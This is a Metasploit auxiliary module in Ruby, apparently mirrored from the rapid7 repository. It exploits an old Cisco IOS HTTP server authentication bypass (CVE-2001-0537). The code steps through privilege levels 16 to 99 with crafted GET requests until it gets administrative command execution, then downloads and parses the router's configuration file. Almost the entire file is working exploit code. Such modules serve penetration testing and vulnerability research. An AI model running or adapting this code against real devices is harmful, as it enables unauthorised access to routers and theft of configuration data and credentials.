Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7


8
  # Exploit mixins should be called first

9
  include Msf::Exploit::Remote::HttpClient

10


11
  # Include Cisco utility methods

12
  include Msf::Auxiliary::Cisco

13


14
  # Scanner mixin should be near last

15
  include Msf::Auxiliary::Scanner

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'Cisco IOS HTTP Unauthorized Administrative Access',

22
        'Description' => %q{

23
          This module exploits a vulnerability in the Cisco IOS HTTP Server.

24
          By sending a GET request for "/level/num/exec/..", where num is between

25
          16 and 99, it is possible to bypass authentication and obtain full system

26
          control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module

27
          tested successfully against a Cisco 1600 Router IOS v11.3(11d).

28
        },

29
        'Author'	=> [ 'aushack', 'hdm' ],

30
        'License'	=> MSF_LICENSE,

31
        'References' => [

32
          [ 'BID', '2936'],

33
          [ 'CVE', '2001-0537'],

34
          [ 'OSVDB', '578' ],

35
        ],

36
        'DisclosureDate' => '2001-06-27',

37
        'Notes' => {

38
          'Reliability' => UNKNOWN_RELIABILITY,

39
          'Stability' => UNKNOWN_STABILITY,

40
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

41
        }

42
      )

43
    )

44
  end

45


46
  def run_host(ip)

47
    16.upto(99) do |level|

48
      res = send_request_cgi({

49
        'uri' => "/level/#{level}/exec/show/version/CR",

50
        'method' => 'GET'

51
      }, 20)

52


53
      if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/

54
        print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")

55


56
        report_vuln(

57
          {

58
            :host	=> rhost,

59
            :port	=> rport,

60
            :proto => 'tcp',

61
            :name	=> self.name,

62
            :sname => ssl ? "https" : "http",

63
            :info	=> "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",

64
            :refs => self.references,

65
            :exploited_at => Time.now.utc

66
          }

67
        )

68


69
        res = send_request_cgi({

70
          'uri' => "/level/#{level}/exec/show/config/CR",

71
          'method' => 'GET'

72
        }, 20)

73


74
        if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi

75
          config = $2.strip

76
          print_good("#{rhost}:#{rport} Processing the configuration file...")

77
          cisco_ios_config_eater(rhost, rport, config)

78
          report_exploit(

79
            {

80
              :host	=> rhost,

81
              :port	=> rport,

82
              :name	=> self.name,

83
              :sname => ssl ? "https" : "http",

84
              :info => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"

85
            }

86
          )

87
        else

88
          print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")

89
        end

90


91
        break

92
      end

93
    end

94
  end

95
end

96


97